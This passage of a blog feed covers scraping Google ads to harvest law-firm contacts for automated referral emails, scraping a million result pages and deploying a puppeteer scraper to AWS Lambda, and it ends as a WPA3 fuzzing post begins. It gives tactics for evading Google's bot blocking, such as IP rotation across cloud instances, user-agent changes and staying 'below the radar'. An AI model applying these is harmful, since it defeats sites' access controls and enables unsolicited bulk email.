<p>So what is Alexandra looking after? She is in need of market supply. So she can offer a continuous stream of many hundreds of clients whose insurances are going to pay large law bills to the legal counselors. So her <strong>goal is to contact as many legal practitioners as possible</strong> and make a contract about client referrals <strong>with the law practitioners that pay the highest referring fee</strong>.</p>
<h2>Mining market supply</h2>
<p>Because Alexandra is so well connected, she contacts the CEO of <a href="https://scrapeulous.com/">scrapeulous.com</a>, a promising startup in the data mining and scraping industry. She asks the staff of scrapeulous to give her a list of contact information of legal practices from distinct law subfields that are actively looking for new clients and are willed to pay a certain percentage for promising referrals.</p>
<p>The staff from scrapeulous suggest to scrape Google advertisement links for certain keyword combinations. The keywords shall consist of a <strong>city name</strong> and <strong>law field</strong> such as for example "family law New York" or "civil law Boston". By scraping the advertisement SERP results, it can be assumed that the law companies that paid for the advertisement are accepting new clients. That way it can be ensured that the practices are willed to offer supply.</p>
<p>Using Google AdSense or Google Ads is probably the best way to reach potential customers. It is assumed that at least 50% of the population in the west find service providers such as a doctors or lawyers by making a Google search with the type of service combined with their geographical location.</p>
<p>By only considering Google Advertisements, it is made sure that the law firms are in demand of new clients. If a existing directory of lawyers would be scraped instead, it cannot be assumed that all leads are actively looking for new clients.</p>
<p>After having extracted the advertisement SERP results, the next step is to visit the advertisement link and extract telephone and email information from the website. Then a generic mail is automatically sent to each law practice with the offer to refer to them new clients, if a certain referral fee (or percentage) is paid. If only 2% of all contacted law firms accept the deal, a very lucrative new revenue stream is generated for the insurance cooperation. Of course in real life, there are a couple of other problems that need to be solved, but we will neglect those for the purpose of this blog post.</p>
<h2>Implementing the lead generation pipeline</h2>
<p>In a first step, the keywords that are monitored for advertisement results are created. In this example, ten large US cities are combined with seven common law subfields. The following cities</p>
<ul>
<li>Detroit</li>
<li>El Paso</li>
<li>Memphis</li>
<li>Seattle</li>
<li>Denver</li>
<li>Washington</li>
<li>Boston</li>
<li>Baltimore</li>
<li>Oklahoma City</li>
<li>Albuquerque</li>
</ul>
<p>and the following keywords </p>
<ul>
<li>DUI law</li>
<li>criminal law</li>
<li>employment law</li>
<li>family law</li>
<li>immigration lawyer</li>
<li>civil law</li>
<li>real estate attorney</li>
</ul>
<p>yields the following <a href="https://incolumitas.com/data/law_keywords.txt">list of 70 keýwords</a> when combined.</p>
<figure>
<img src="https://incolumitas.com/images/keyword_gen.png" alt="keyword generation" style="width: 100%;" />
<figcaption>Quickly generating keywords with Python</figcaption>
</figure>
<p>After the keywords have been created, it's time to obtain the SERP result pages from Google. It's mandatory to scrape from the same country as the services offered. Therefore, the keywords need to be scraped from the US. Furthermore, we only want the links from advertisements. Google will not display advertisements to a simple scraping script that requests the page with a HTTP GET request, instead a headless browser such as chromium controlled via <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a> must be used.</p>
<p>Because we do not want to reinvent the wheel, we will simply use the SERP API from <a href="https://scrapeulous.com/">scrapeulous.com</a> and sign up to a free plan that allows to search up to 500 keywords on Google. You can easily <a href="https://scrapeulous.com/accounts/signup/">sign up here</a>.</p>
<p>After you have signed up, <a href="https://scrapeulous.com/dashboard/api">go to the dashboard</a> where you can see the instructions how to use the API. You should also copy your API key into the script below. We will scrape all 70 keywords from the region US with the following quick Python script that makes use of the SERP API and downloads the keywords from this blog.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="n">url</span> <span class="o">=</span> <span class="s1">'https://scrapeulous.com/api/new'</span>
<span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'https://incolumitas.com/data/law_keywords.txt'</span><span class="p">)</span>
<span class="n">keywords</span> <span class="o">=</span> <span class="p">[</span><span class="n">kw</span> <span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">req</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span> <span class="k">if</span> <span class="n">kw</span><span class="p">]</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"search_engine"</span><span class="p">:</span> <span class="s2">"google"</span><span class="p">,</span>
<span class="s2">"num_pages"</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span>
<span class="s2">"region"</span><span class="p">:</span> <span class="s2">"us"</span><span class="p">,</span>
<span class="s2">"keywords"</span><span class="p">:</span> <span class="n">keywords</span>
<span class="p">}</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'X-Api-Key'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'scraped_keywords.json'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">json</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
</code></pre></div>
<p>After having scraped those keywords with scrapeulous.com, it's time to extract the paid advertisement links from the SERP data. The following little script does the job and prints out all advertisement links that have been gathered from the SERP results:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">json</span>
<span class="n">ad_links</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'scraped_keywords.json'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="k">for</span> <span class="n">kw</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="s1">'1'</span> <span class="ow">in</span> <span class="n">value</span><span class="p">:</span>
<span class="k">for</span> <span class="n">ad</span> <span class="ow">in</span> <span class="n">value</span><span class="p">[</span><span class="s1">'1'</span><span class="p">][</span><span class="s1">'bottom_ads'</span><span class="p">]:</span>
<span class="n">ad_links</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ad</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'link'</span><span class="p">))</span>
<span class="k">for</span> <span class="n">ad</span> <span class="ow">in</span> <span class="n">value</span><span class="p">[</span><span class="s1">'1'</span><span class="p">][</span><span class="s1">'top_ads'</span><span class="p">]:</span>
<span class="n">ad_links</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ad</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'link'</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">ad_links</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ad_links</span><span class="p">))</span>
</code></pre></div>
<p>The above code prints out 17 advertisement links, admittedly not many, but it is enough to justify the purpose of this blog post. When repeating the scraping process, Google will likely serve different advertisement links.</p>
<p>After that, we will use another scraping tool from scrapeulous.com, <a href="https://scrapeulous.com/dashboard/cloud-crawler">the cloud crawler API</a>. The <a href="https://github.com/NikolaiT/scrapeulous/blob/master/leads.js">lead scraping function</a> from cloudcrawler will be used and all valid urls will be fed into this function.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="n">ad_links</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'https://www.drunkdrivinglawyers.com/sem/dui-api1'</span><span class="p">,</span> <span class="s1">'https://ij.org/detroit-forfeiture/'</span><span class="p">,</span> <span class="s1">'https://www.fiegerlaw.com/employment-law/'</span><span class="p">,</span> <span class="s1">'http://immigrationlawyer911.com/'</span><span class="p">,</span> <span class="s1">'https://www.geoffreygnathanlaw.com/'</span><span class="p">,</span> <span class="s1">'https://www.duidenver.com/-/denver/dui-defense/'</span><span class="p">,</span> <span class="s1">'https://www.dui.com/colorado/denver-county/'</span><span class="p">,</span> <span class="s1">'https://www.lazzaralegal.com/criminal-defense/dui/'</span><span class="p">,</span> <span class="s1">'https://www.midsouthcriminaldefense.com/criminal-defense/dui/'</span><span class="p">,</span> <span class="s1">'https://www.duncanandhill.com/'</span><span class="p">,</span> <span class="s1">'https://www.bishoplawmd.com/practice-area/dui-law/'</span><span class="p">,</span> <span class="s1">'https://www.bishoplawmd.com/practice-area/criminal-law/'</span><span class="p">,</span> <span class="s1">'https://family.unbundledlegalhelp.com/alimony/baltimore-md?t=nil'</span><span class="p">,</span> <span class="s1">'https://cordellcordell.com/offices/maryland/baltimore/family-law-for-men-baltimore/'</span><span class="p">,</span> <span class="s1">'https://barrjoneslegal.com/'</span><span class="p">,</span> <span class="s1">'https://www.raygriffithlaw.com/'</span><span class="p">,</span> <span class="s1">'https://www.drunkdrivinglawyers.com/sem/dui-api1'</span><span class="p">]</span>
<span class="n">url</span> <span class="o">=</span> <span class="s1">'https://scrapeulous.com/api/cc'</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"invocation_type"</span><span class="p">:</span> <span class="s2">"request_response"</span><span class="p">,</span>
<span class="s2">"worker_type"</span><span class="p">:</span> <span class="s2">"http"</span><span class="p">,</span>
<span class="s2">"function"</span><span class="p">:</span> <span class="s2">"https://raw.githubusercontent.com/NikolaiT/scrapeulous/master/leads.js"</span><span class="p">,</span>
<span class="s2">"items"</span><span class="p">:</span> <span class="n">ad_links</span><span class="p">,</span>
<span class="s2">"region"</span><span class="p">:</span> <span class="s2">"de"</span>
<span class="p">}</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'X-Api-Key'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'leads.json'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">json</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
</code></pre></div>
<p>And the above code will produce the following <a href="https://incolumitas.com/data/leads.json">lead contact information results</a>. Surely they are not perfect, but if this process is repeated with more keywords and every six hours with a cronjob, you will end up with many lead contact information to which you can send automated emails that include your detailed offer of referring law clients.</p>
<h2>Conclusion</h2>
<p>In this blog post it was shown using a example scenario how it is possible to connect existing demand with supply and make money by bringing together service providers with new clients. Scraping Google Ads is an efficient method to locate service providers that have enough supply.</p>
<p>This strategy can be applied to any other industry where you control the demand.</p>Scraping 1 million keywords on the Google Search Engine2019-09-17T23:30:00+02:002019-09-17T23:30:00+02:00Nikolai Tschachertag:incolumitas.com,2019-09-17:/2019/09/17/scraping-one-million-google-serps/<p>Scraping one million keywords is not a easy task. There are proxy problems, big data problems and reliability issues. In this blog post, the most valuable insights are shared.</p><p>This blog post is not a practical guide on how to scrape one million keywords on Google. It rather presents a collection of thoughts on technical issues that have been encountered during the journey of scraping 1 million SERP's on Google. Different possible scraping architectures and methodologies are discussed as well.</p>
<h2>Problems encountered when scraping 1 million Google SERP's</h2>
<h3>The big data problem</h3>
<p>Launching millions of http requests creates immediately a bunch of different issues. There is the problem of the <strong>size of the crawled data</strong>. Assuming that one request produces 50 kilobytes of data, the total amount of crawled data amounts to 50GB in size. It is annoying to store such amounts of data on the central production server (especially when processing several scrape jobs of this size), therefore it makes sense to store it in the cloud on <a href="https://cloud.google.com/storage/docs/storage-classes">Nearline Storage</a>. AWS S3 or GCP Storage are examples for cloud storage services. The costs to store 50GB of data are negligible, it won't cost you more than a few cents.</p>
<figure>
<img src="https://sloanreview.mit.edu/content/uploads/2016/11/MAG-FR-Chai-Big-Data-1200x627.jpg
" alt="big data" style="width: 100%" />
<figcaption>Scraping produces a lot of data (Source: https://sloanreview.mit.edu/article/why-big-data-isnt-enough/) </figcaption>
</figure>
<h3>The proxy problem</h3>
<p>Another major problem is the issue of getting blocked by Google when repeatedly using the same IP address for the scraping process. Therefore, the ambitious scraping apprentice needs to rent either different cloud computing resources or needs to subscribe to a proxy provider such as <a href="https://luminati.io/">luminati.io</a> or <a href="https://intoli.com/">intoli.com</a>. Web scraping is a <strong>dirty business</strong>. When you subscribe to a proxy service, you never know <a href="https://proxyway.com/guides/best-proxy-providers-for-amazon">how <em>clean</em> the proxies actually are</a>. Furthermore, using http or socks proxies usually reduces the RTT and latency, all factors that the might Google search engine considers when classifying the likelihood of the client being a annoying automated scraping process.</p>
<p>As a viable alternative solution to using a proxy provider is the renting of cloud computing instances. You could run your <a href="https://incolumitas.com/2019/08/31/web-scraping-puppeteer-aws-lambda/#web-scraping-puppeteer-aws-lambda">scraping logic on Amazon AWS</a> or on GCP Functions. Back in June 2018, I tested how many keywords you can actually scrape with one IP address and a headless chrome browser controlled with <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a> before getting blocked. This usually depends on many different factors. I tested different combinations consisting of the variables:</p>
<ol>
<li>Randomly sleeping between requests</li>
<li><a href="https://www.npmjs.com/package/user-agents">Changing user agents</a> between requests</li>
<li>Different levels of concurrency (With incognito chrome browser windows)</li>
<li>Blocking certain media requests or image loading requests</li>
</ol>
<p>It turned out that the best combination of the above variables (and a couple more) gave us up to <strong>2806</strong> successful requests with a single datacenter IP address from a well known cloud provider before Google blocked us. The average number of successful requests was usually between 1000 and 1500. This number would likely increase when a residential proxy is chosen.</p>
<p>I developed a <a href="https://github.com/NikolaiT/se-scraper">little library named se-scraper</a> that allows to scrape search engines such as Google, Bing or Yandex. The library has convenient docker support and runs on Ubuntu 18.04 and newer versions. It's main purpose is to scrape the most common search engines in a robust fashion. Therefore, the library comes shipped with a lot of static tests for different Google/Bing SERP layouts.</p>
<p>One possible approach would be to create one large bucket on S3 that serves as data storage and create a script that automatically spawns new cloud VPS server instances via the cloud service API. Those VPS servers are billed by hour and the price for 2GB RAM is around $0.015/hour on a common cloud service provider. Assuming that each such instance manages to scrape 500 keywords in one hour before getting blocked by Google, we need to rent 1.000.000 / 500 = 2000 VPS instances. This accumulates to roughly 30 USD in infrastructure costs. </p>
<h3>The task queuing problem</h3>
<p>A central instance is required that keeps track of the keywords that have already been scraped. On <a href="https://scrapeulous.com/">scrapeulous.com</a>, a simple Python dictionary is used as queue that is stored as JSON file on disk and updated as soon as a scraping worker made progress. Of course Redis may also be used as in memory storage for the queue (with <a href="https://redis.io/topics/persistence">persistance</a>). However, I don't see the necessity if the queue file is only updated a couple of thousand times. A modern SSD should manage that frequency without any hassle.</p>
<p>This central instance decides when and how a new scraping worker needs to be launched. The scraping worker accepts an array of keywords, attempts to scrape this array of keywords, uploads the results to the AWS S3 storage and notifies the central instance with the list of keywords that have been successfully scraped. The central instance updates the queue and schedules another worker. The central instance also decides how many parallel workers should make progress.</p>
<h3>The noise problem</h3>
<p>Scraping is not really appreciated by many website maintainers. Therefore, the scraping infrastructure should not annoy the target website and should <strong>hide below-the-radar</strong>. Hence, the number of parallel scraping workers should be reduced and the scraping process must be distributed evenly over a time interval of at least 7 days in order to not create large, suspicious traffic spikes. By scraping over a time interval of at least 7 days, 5952 keywords per hour are required to be scraped, or 1.65 keywords per second. This frequency should not be suspicious for a search engine as large as Google, that handles probably hundred thousands of requests per second.</p>
<figure>
<img src="https://internet-governance-radar.de/assets/images/radar_2.jpg" alt="stay under the radar" style="width: 100%" />
<figcaption>The distributed scraping should stay under the radar (Source: https://internet-governance-radar.de) </figcaption>
</figure>
<h3>Conclusion</h3>
<p>By scraping one million keywords, a few important things have been learned:</p>
<ol>
<li>Absolutely use a <strong>queuing based approach</strong>, otherwise things get complicated quickly and a lot of time is lost trying to figure out what keywords were already scraped.</li>
<li>All operations should be idempotent. This means that repeatedly executing the same operation does not destroy any results. In maths: If we have a function <code>f(x) = y</code>, then <code>f</code> is idempotent if <code>f(f(x)) = f(x) = y</code></li>
<li><strong>Do not piss of the scraped website</strong>. Therefore, distribute the scraping over a larger time interval in order to avoid excess traffic or even a DoS.</li>
<li><strong>Divide and Conquer</strong>: Use several scraping worker instances with distinct IP addresses from a cloud computing provider. Change the worker if the IP address is detected. Only use a cloud service provider that allows to rent computing instances on a hourly base.</li>
</ol>
<p>If you also want to scrape 1 million keywords on any website, please contact us at <a href="https://scrapeulous.com/contact/">scrapeulous.com</a>.</p>Scraping with puppeteer and headless chrome deployed to AWS Lambda2019-08-31T22:30:00+02:002019-08-31T22:30:00+02:00Nikolai Tschachertag:incolumitas.com,2019-08-31:/2019/08/31/web-scraping-puppeteer-aws-lambda/<p>In this blog post, we demonstrate how a web scraping function is deployed to the AWS cloud with puppeteer and headless chrome.</p><p>One of the most pressing issues with web scraping/crawling is the part where you get detected and blocked from the website. When scraping is implemented with raw http requests, it is usually pretty straightforward to detect the scraper by delivering a piece of javascript, that when not executed with a modern javascript engine, blocks all further access. There are a myriad of other strategies to distinguish bots from real human beings (Captchas, mouse movement, rendering functionality, ...). For those reasons, it is usually a smart idea to use a real browser such as headless chrome to accomplish web scraping projects.</p>
<p>This comes with the benefits of simplicity. It is much simpler to handle login functionality and complex browsing actions by programming a real web browser. The library to control headless chrome is called <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a>.</p>
<p>In this short blog post, it is demonstrated how a simple Google Scraper can be deployed to the AWS cloud. All you need is some knowledge of Javascript, an AWS account and one hour of your time. In the you will have a scraper that allows you to scrape any keywords on Google. The huge advantage of deploying the scraping is to the cloud. You can massively parallelize your crawling/scraping algorithms. </p>
<p>All code can be found in the <a href="https://github.com/NikolaiT/aws-scraper-example">respective GitHub repository</a>.</p>
<h2>Setting up the project</h2>
<p>The required javascript libraries are <code>user-agents</code>, <code>chrome-aws-lambda</code>, <code>aws-sdk</code> and <code>puppeteer-core</code>. You can install them with the <code>npm</code> node package manager. Alternatively, you can clone the <a href="">following git repository</a> where I have already setup everything. You also need to install the serverless package globally. You can <a href="https://serverless.com/framework/docs/providers/aws/guide/quick-start/">read up the instructions here how to do so</a>.</p>
<p>After you cloned the repository with the command <code>git clone git@github.com:NikolaiT/aws-scraper-example.git</code>, it is time to setup you AWS credentials. Enter them into the file <code>.env</code>. The <code>.env</code> file has the following boilerplate structure: </p>
<div class="highlight"><pre><span></span><code>export AWS_ACCESS_KEY=
export AWS_SECRET_KEY=
export AWS_REGION=us-east-1
export AWS_PROFILE=
export AWS_FUNCTION_URN=
</code></pre></div>
<p>you need to enter the user and secret key credentials that you received when you created your AWS account. After that, you are all set to deploy the scraper to AWS Lambda cloud:</p>
<div class="highlight"><pre><span></span><code><span class="nb">source</span> .env
serverless deploy
</code></pre></div>
<p>After a successful deployment, <code>serverless</code> outputs a message such as the following:</p>
<div class="highlight"><pre><span></span><code>$ serverless deploy
Serverless: Packaging service...
Serverless: Excluding development dependencies...
Serverless: Creating Stack...
Serverless: Checking Stack create progress...
.....
Serverless: Stack create finished...
Serverless: Uploading CloudFormation file to S3...
Serverless: Uploading artifacts...
Serverless: Uploading service google-aws-scraper.zip file to S3 <span class="o">(</span><span class="m">39</span>.4 MB<span class="o">)</span>...
Serverless: Validating template...
Serverless: Updating Stack...
Serverless: Checking Stack update progress...
...............
Serverless: Stack update finished...
Service Information
service: google-aws-scraper
stage: dev
region: us-east-1
stack: google-aws-scraper-dev
resources: <span class="m">5</span>
api keys:
None
endpoints:
None
functions:
google-aws-scraper: google-aws-scraper-dev-google-aws-scraper
layers:
None
Serverless: Run the <span class="s2">"serverless"</span> <span class="nb">command</span> to setup monitoring, troubleshooting and testing
</code></pre></div>
<p>Now you need to update the <code>.env</code> file with the correct function name of your deployed scraper. You can look up the function name in the AWS console in the Lambda tab of the correct region.</p>
<h2>Testing the cloud scraper</h2>
<p>After the successful lambda function deployment, we can test if it is possible to search google with our headless chrome function living in the AWS cloud. For this task, we create a <code>test.js</code> script that invokes the AWS function. The test script has the following contents:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">AWS</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'aws-sdk'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'fs'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">invokeLambda</span> <span class="o">=</span> <span class="p">(</span><span class="nx">lambda</span><span class="p">,</span> <span class="nx">params</span><span class="p">)</span> <span class="p">=></span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">lambda</span><span class="p">.</span><span class="nx">invoke</span><span class="p">(</span><span class="nx">params</span><span class="p">,</span> <span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">reject</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">main</span> <span class="o">=</span> <span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">region</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_REGION</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">functionURN</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_FUNCTION_URN</span><span class="p">;</span>
<span class="c1">// You shouldn't hard-code your keys in production!</span>
<span class="c1">// http://docs.aws.amazon.com/AWSJavaScriptSDK/guide/node-configuring.html</span>
<span class="nx">AWS</span><span class="p">.</span><span class="nx">config</span><span class="p">.</span><span class="nx">update</span><span class="p">({</span>
<span class="nx">accessKeyId</span><span class="o">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_ACCESS_KEY</span><span class="p">,</span>
<span class="nx">secretAccessKey</span><span class="o">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_SECRET_KEY</span><span class="p">,</span>
<span class="nx">region</span><span class="o">:</span> <span class="nx">region</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">lambda</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">AWS</span><span class="p">.</span><span class="nx">Lambda</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">keywords</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'weather berlin'</span><span class="p">,</span> <span class="s1">'news germany'</span><span class="p">,</span> <span class="s1">'what else'</span><span class="p">,</span> <span class="s1">'some keyword'</span><span class="p">];</span>
<span class="kd">let</span> <span class="nx">promises</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">kw</span> <span class="k">of</span> <span class="nx">keywords</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">event</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">keyword</span><span class="o">:</span> <span class="nx">kw</span> <span class="p">};</span>
<span class="kd">let</span> <span class="nx">params</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">FunctionName</span><span class="o">:</span> <span class="nx">functionURN</span><span class="p">,</span>
<span class="nx">InvocationType</span><span class="o">:</span> <span class="s2">"RequestResponse"</span><span class="p">,</span>
<span class="nx">Payload</span><span class="o">:</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">event</span><span class="p">),</span>
<span class="p">};</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">params</span><span class="p">);</span>
<span class="nx">promises</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span>
<span class="nx">invokeLambda</span><span class="p">(</span><span class="nx">lambda</span><span class="p">,</span> <span class="nx">params</span><span class="p">)</span>
<span class="p">)</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Invoked </span><span class="si">${</span><span class="nx">promises</span><span class="p">.</span><span class="nx">length</span><span class="si">}</span><span class="sb"> lambda requests!`</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">start</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="nx">promises</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">end</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">()</span> <span class="o">-</span> <span class="nx">start</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`invokeLambda() in region </span><span class="si">${</span><span class="nx">region</span><span class="si">}</span><span class="sb"> took </span><span class="si">${</span><span class="nx">end</span><span class="o">/</span><span class="mf">1000</span><span class="si">}</span><span class="sb"> seconds`</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">result</span> <span class="k">of</span> <span class="nx">results</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">data</span> <span class="o">=</span> <span class="nx">result</span><span class="p">.</span><span class="nx">Payload</span><span class="p">;</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">data</span><span class="p">,</span> <span class="p">{</span><span class="nx">depth</span><span class="o">:</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">colors</span><span class="o">:</span> <span class="kc">true</span><span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`invokeLambda() in region </span><span class="si">${</span><span class="nx">region</span><span class="si">}</span><span class="sb"> took </span><span class="si">${</span><span class="nx">end</span> <span class="o">/</span> <span class="mf">1000</span><span class="si">}</span><span class="sb"> seconds`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nx">main</span><span class="p">().</span><span class="k">catch</span><span class="p">(</span><span class="nx">error</span> <span class="p">=></span> <span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">error</span><span class="p">));</span>
</code></pre></div>
<p>You need to first source the <code>.env</code> file with the correct parameters in order for the test script to properly work. After that, execute the test script and the four keywords will be searched on Google via AWS Lambda cloud:</p>
<p><code>node test.js</code></p>
<p>This command should output four array of urls obtained from the Google SERP.</p>
<h2>Conclusion</h2>
<p>In this tutorial we learned how to deploy a scraping function to the AWS Lambda cloud. One big advantage of the cloud is that you only pay for the computing time that your function needed. The free tier includes a large computing volume, such that you may develop whatever your scraping heart desires.</p>
<p>If you want to only focus on the scraping logic and don't want to hassle with scalability issues, intelligent request retries and infrastructure problems, you can direct use the web scraper service on <a href="https://scrapeulous.com/">scrapeulous.com</a>. It comes with many practical examples how to quickly create a scraper of crawler for any website in the Internet.</p>Fuzzing the WPA3 Dragonfly handshake2019-07-18T00:39:00+02:002019-07-19T17:37:00+02:00Nikolai Tschachertag:incolumitas.com,2019-07-18:/2019/07/18/fuzzing-the-wpa3-dragonfly-handshake-with-boofuzz/<p>Implementing possible fuzzing strategies with <strong>boofuzz</strong> against the WPA3 SAE Dragonfly handshake. Dragonfly is the main ingredient of WPA3 certified routers and 802.11 devices.</p><h2>Introduction</h2>
<p>In this blog post we learn how to perform a fuzzing test against a 802.11 authenticator (better known as Access Point). We will use <a href="https://boofuzz.readthedocs.io/en/latest/">boofuzz</a>, the successor of the well-known Sulley fuzzing framework. </p>
<p>WPA3 is slowly emerging in the 802.11 modem and router industry. There aren't many devices yet, but production of WPA3 certified devices is expected to increase in the foreseeable future. This means that there will be a additional PAKE key exchange that is plugged in front of the old 4-way handshake, which is part of WPA and WPA2. This new handshake ensures two additional security properties:</p>
<ol>
<li><strong>Perfect forward secrecy</strong>: Once a key was revealed, it cannot be used to decrypt past sessions</li>
